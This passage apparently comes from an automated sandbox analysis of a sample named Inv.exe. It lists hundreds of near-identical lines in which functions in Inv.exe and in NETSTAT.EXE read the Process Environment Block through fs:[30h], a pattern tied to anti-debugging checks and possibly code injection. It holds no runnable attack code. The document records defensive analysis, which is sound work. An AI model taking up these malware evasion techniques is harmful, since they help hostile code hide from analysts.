Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194AD30 mov eax, dword ptr fs:[00000030h] 1_2_0194AD30
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019CA537 mov eax, dword ptr fs:[00000030h] 1_2_019CA537
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h] 1_2_01974D3B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h] 1_2_01974D3B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h] 1_2_01974D3B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01967D50 mov eax, dword ptr fs:[00000030h] 1_2_01967D50
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01983D43 mov eax, dword ptr fs:[00000030h] 1_2_01983D43
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C3540 mov eax, dword ptr fs:[00000030h] 1_2_019C3540
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196C577 mov eax, dword ptr fs:[00000030h] 1_2_0196C577
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196C577 mov eax, dword ptr fs:[00000030h] 1_2_0196C577
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195849B mov eax, dword ptr fs:[00000030h] 1_2_0195849B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A014FB mov eax, dword ptr fs:[00000030h] 1_2_01A014FB
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h] 1_2_019C6CF0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h] 1_2_019C6CF0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h] 1_2_019C6CF0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A18CD6 mov eax, dword ptr fs:[00000030h] 1_2_01A18CD6
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h] 1_2_019C6C0A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h] 1_2_019C6C0A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h] 1_2_019C6C0A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h] 1_2_019C6C0A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h] 1_2_01A1740D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h] 1_2_01A1740D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h] 1_2_01A1740D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197BC2C mov eax, dword ptr fs:[00000030h] 1_2_0197BC2C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DC450 mov eax, dword ptr fs:[00000030h] 1_2_019DC450
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DC450 mov eax, dword ptr fs:[00000030h] 1_2_019DC450
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197A44B mov eax, dword ptr fs:[00000030h] 1_2_0197A44B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196746D mov eax, dword ptr fs:[00000030h] 1_2_0196746D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01958794 mov eax, dword ptr fs:[00000030h] 1_2_01958794
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h] 1_2_019C7794
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h] 1_2_019C7794
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h] 1_2_019C7794
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019837F5 mov eax, dword ptr fs:[00000030h] 1_2_019837F5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196F716 mov eax, dword ptr fs:[00000030h] 1_2_0196F716
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DFF10 mov eax, dword ptr fs:[00000030h] 1_2_019DFF10
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DFF10 mov eax, dword ptr fs:[00000030h] 1_2_019DFF10
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197A70E mov eax, dword ptr fs:[00000030h] 1_2_0197A70E
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197A70E mov eax, dword ptr fs:[00000030h] 1_2_0197A70E
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197E730 mov eax, dword ptr fs:[00000030h] 1_2_0197E730
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A1070D mov eax, dword ptr fs:[00000030h] 1_2_01A1070D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A1070D mov eax, dword ptr fs:[00000030h] 1_2_01A1070D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01944F2E mov eax, dword ptr fs:[00000030h] 1_2_01944F2E
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01944F2E mov eax, dword ptr fs:[00000030h] 1_2_01944F2E
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A18F6A mov eax, dword ptr fs:[00000030h] 1_2_01A18F6A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195EF40 mov eax, dword ptr fs:[00000030h] 1_2_0195EF40
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195FF60 mov eax, dword ptr fs:[00000030h] 1_2_0195FF60
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h] 1_2_01A10EA5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h] 1_2_01A10EA5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h] 1_2_01A10EA5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DFE87 mov eax, dword ptr fs:[00000030h] 1_2_019DFE87
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C46A7 mov eax, dword ptr fs:[00000030h] 1_2_019C46A7
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019736CC mov eax, dword ptr fs:[00000030h] 1_2_019736CC
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019FFEC0 mov eax, dword ptr fs:[00000030h] 1_2_019FFEC0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01988EC7 mov eax, dword ptr fs:[00000030h] 1_2_01988EC7
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019716E0 mov ecx, dword ptr fs:[00000030h] 1_2_019716E0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A18ED6 mov eax, dword ptr fs:[00000030h] 1_2_01A18ED6
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019576E2 mov eax, dword ptr fs:[00000030h] 1_2_019576E2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197A61C mov eax, dword ptr fs:[00000030h] 1_2_0197A61C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197A61C mov eax, dword ptr fs:[00000030h] 1_2_0197A61C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E42AE4 mov eax, dword ptr fs:[00000030h] 4_2_02E42AE4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E42ACB mov eax, dword ptr fs:[00000030h] 4_2_02E42ACB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h] 4_2_02E152A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h] 4_2_02E152A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h] 4_2_02E152A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h] 4_2_02E152A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h] 4_2_02E152A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2AAB0 mov eax, dword ptr fs:[00000030h] 4_2_02E2AAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2AAB0 mov eax, dword ptr fs:[00000030h] 4_2_02E2AAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4FAB0 mov eax, dword ptr fs:[00000030h] 4_2_02E4FAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4D294 mov eax, dword ptr fs:[00000030h] 4_2_02E4D294
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4D294 mov eax, dword ptr fs:[00000030h] 4_2_02E4D294
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ECB260 mov eax, dword ptr fs:[00000030h] 4_2_02ECB260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ECB260 mov eax, dword ptr fs:[00000030h] 4_2_02ECB260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE8A62 mov eax, dword ptr fs:[00000030h] 4_2_02EE8A62
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5927A mov eax, dword ptr fs:[00000030h] 4_2_02E5927A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h] 4_2_02E19240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h] 4_2_02E19240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h] 4_2_02E19240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h] 4_2_02E19240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDEA55 mov eax, dword ptr fs:[00000030h] 4_2_02EDEA55
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EA4257 mov eax, dword ptr fs:[00000030h] 4_2_02EA4257
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E54A2C mov eax, dword ptr fs:[00000030h] 4_2_02E54A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E54A2C mov eax, dword ptr fs:[00000030h] 4_2_02E54A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E28A0A mov eax, dword ptr fs:[00000030h] 4_2_02E28A0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E15210 mov eax, dword ptr fs:[00000030h] 4_2_02E15210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E15210 mov ecx, dword ptr fs:[00000030h] 4_2_02E15210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E15210 mov eax, dword ptr fs:[00000030h] 4_2_02E15210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E15210 mov eax, dword ptr fs:[00000030h] 4_2_02E15210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1AA16 mov eax, dword ptr fs:[00000030h] 4_2_02E1AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1AA16 mov eax, dword ptr fs:[00000030h] 4_2_02E1AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDAA16 mov eax, dword ptr fs:[00000030h] 4_2_02EDAA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDAA16 mov eax, dword ptr fs:[00000030h] 4_2_02EDAA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E33A1C mov eax, dword ptr fs:[00000030h] 4_2_02E33A1C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h] 4_2_02E403E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h] 4_2_02E403E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h] 4_2_02E403E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h] 4_2_02E403E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h] 4_2_02E403E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h] 4_2_02E403E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3DBE9 mov eax, dword ptr fs:[00000030h] 4_2_02E3DBE9
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E953CA mov eax, dword ptr fs:[00000030h] 4_2_02E953CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E953CA mov eax, dword ptr fs:[00000030h] 4_2_02E953CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E44BAD mov eax, dword ptr fs:[00000030h] 4_2_02E44BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E44BAD mov eax, dword ptr fs:[00000030h] 4_2_02E44BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E44BAD mov eax, dword ptr fs:[00000030h] 4_2_02E44BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE5BA5 mov eax, dword ptr fs:[00000030h] 4_2_02EE5BA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED138A mov eax, dword ptr fs:[00000030h] 4_2_02ED138A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ECD380 mov ecx, dword ptr fs:[00000030h] 4_2_02ECD380
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E21B8F mov eax, dword ptr fs:[00000030h] 4_2_02E21B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E21B8F mov eax, dword ptr fs:[00000030h] 4_2_02E21B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E42397 mov eax, dword ptr fs:[00000030h] 4_2_02E42397
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4B390 mov eax, dword ptr fs:[00000030h] 4_2_02E4B390
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1DB60 mov ecx, dword ptr fs:[00000030h] 4_2_02E1DB60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E43B7A mov eax, dword ptr fs:[00000030h] 4_2_02E43B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E43B7A mov eax, dword ptr fs:[00000030h] 4_2_02E43B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1DB40 mov eax, dword ptr fs:[00000030h] 4_2_02E1DB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE8B58 mov eax, dword ptr fs:[00000030h] 4_2_02EE8B58
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1F358 mov eax, dword ptr fs:[00000030h] 4_2_02E1F358
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED131B mov eax, dword ptr fs:[00000030h] 4_2_02ED131B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E140E1 mov eax, dword ptr fs:[00000030h] 4_2_02E140E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E140E1 mov eax, dword ptr fs:[00000030h] 4_2_02E140E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E140E1 mov eax, dword ptr fs:[00000030h] 4_2_02E140E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E158EC mov eax, dword ptr fs:[00000030h] 4_2_02E158EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h] 4_2_02EAB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAB8D0 mov ecx, dword ptr fs:[00000030h] 4_2_02EAB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h] 4_2_02EAB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h] 4_2_02EAB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h] 4_2_02EAB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h] 4_2_02EAB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h] 4_2_02E420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h] 4_2_02E420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h] 4_2_02E420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h] 4_2_02E420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h] 4_2_02E420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h] 4_2_02E420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E590AF mov eax, dword ptr fs:[00000030h] 4_2_02E590AF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4F0BF mov ecx, dword ptr fs:[00000030h] 4_2_02E4F0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4F0BF mov eax, dword ptr fs:[00000030h] 4_2_02E4F0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4F0BF mov eax, dword ptr fs:[00000030h] 4_2_02E4F0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E19080 mov eax, dword ptr fs:[00000030h] 4_2_02E19080
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E93884 mov eax, dword ptr fs:[00000030h] 4_2_02E93884
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E93884 mov eax, dword ptr fs:[00000030h] 4_2_02E93884
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE1074 mov eax, dword ptr fs:[00000030h] 4_2_02EE1074
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED2073 mov eax, dword ptr fs:[00000030h] 4_2_02ED2073
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E30050 mov eax, dword ptr fs:[00000030h] 4_2_02E30050
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E30050 mov eax, dword ptr fs:[00000030h] 4_2_02E30050
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h] 4_2_02E2B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h] 4_2_02E2B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h] 4_2_02E2B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h] 4_2_02E2B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h] 4_2_02E4002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h] 4_2_02E4002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h] 4_2_02E4002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h] 4_2_02E4002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h] 4_2_02E4002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h] 4_2_02E3A830
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h] 4_2_02E3A830
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h] 4_2_02E3A830
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h] 4_2_02E3A830
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE4015 mov eax, dword ptr fs:[00000030h] 4_2_02EE4015
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE4015 mov eax, dword ptr fs:[00000030h] 4_2_02EE4015
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E97016 mov eax, dword ptr fs:[00000030h] 4_2_02E97016
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E97016 mov eax, dword ptr fs:[00000030h] 4_2_02E97016
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E97016 mov eax, dword ptr fs:[00000030h] 4_2_02E97016
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1B1E1 mov eax, dword ptr fs:[00000030h] 4_2_02E1B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1B1E1 mov eax, dword ptr fs:[00000030h] 4_2_02E1B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1B1E1 mov eax, dword ptr fs:[00000030h] 4_2_02E1B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EA41E8 mov eax, dword ptr fs:[00000030h] 4_2_02EA41E8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E461A0 mov eax, dword ptr fs:[00000030h] 4_2_02E461A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E461A0 mov eax, dword ptr fs:[00000030h] 4_2_02E461A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h] 4_2_02ED49A4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h] 4_2_02ED49A4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h] 4_2_02ED49A4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h] 4_2_02ED49A4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E969A6 mov eax, dword ptr fs:[00000030h] 4_2_02E969A6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h] 4_2_02E951BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h] 4_2_02E951BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h] 4_2_02E951BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h] 4_2_02E951BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h] 4_2_02E399BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h] 4_2_02E399BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h] 4_2_02E399BF
